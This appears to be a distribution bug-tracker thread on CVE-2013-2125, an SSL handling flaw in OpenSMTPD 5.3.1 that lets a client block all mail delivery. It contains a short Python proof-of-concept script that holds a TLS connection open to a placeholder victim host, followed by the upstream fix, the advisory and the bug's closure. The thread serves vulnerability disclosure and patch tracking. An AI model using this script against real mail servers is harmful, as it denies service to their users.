From ${URL} : The SSL handling in the latest OpenSMTPD (5.3.1) misconfigures its sockets in blocking mode, allowing an attacker to prevent all mail delivery simply by holding a socket open. I discovered this accidentally, as I noticed my HP printer's smtp client would keep the connection indefinitely open after an unsuccessful authentication attempt, causing no more mail to be delivered until I SIGKILL'd my smtpd process or unplugged my printer. The following reproduces the attack trivially: #!/usr/bin/env python2 import smtplib import time print "[+] Connecting to server and initiating TLS" smtp = smtplib.SMTP("mail.some-vitim-host.blah", 587) smtp.starttls() print "[+] No clients will be able to connect as long as this remains open." time.sleep(100000000) Apparently this was fixed recently upstream, noting "evil client" in the commit message: http://git.zx2c4.com/OpenSMTPD/commit/?id=38b26921bad5fe24ad747bf9d591330d683728b0 A snapshot has been posted to http://www.opensmtpd.org/archives/ , but no patch release has yet been made. @maintainer(s): after the bump, in case we need to stabilize the package, please say explicitly if it is ready for the stabilization or not.
CVE-2013-2125 (http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-2125): OpenSMTPD before 5.3.2 does not properly handle SSL sessions, which allows remote attackers to cause a denial of service (connection blocking) by keeping a connection open.
As per the opensmtpd page this looks to be fixed in version: OpenSMTPD 5.3.1 Security Advisories These are the OpenSMTPD 5.3.1 advisories -- all these problems are solved in our repository as well as in newer snapshots and releases. May 16, 2013: OpenSMTPD's SSL layer has a bug in the IO events handler which can cause an evil client or server to hang all active SSL sessions until they timeout, causing a DoS in smtp and transfer processes. https://www.opensmtpd.org/security.html Closing the bug as resolved as we do not have earlier versions in tree other then 5.4.1. If I am mistaken please advise and we will address. Adding to master GLSA for 2013.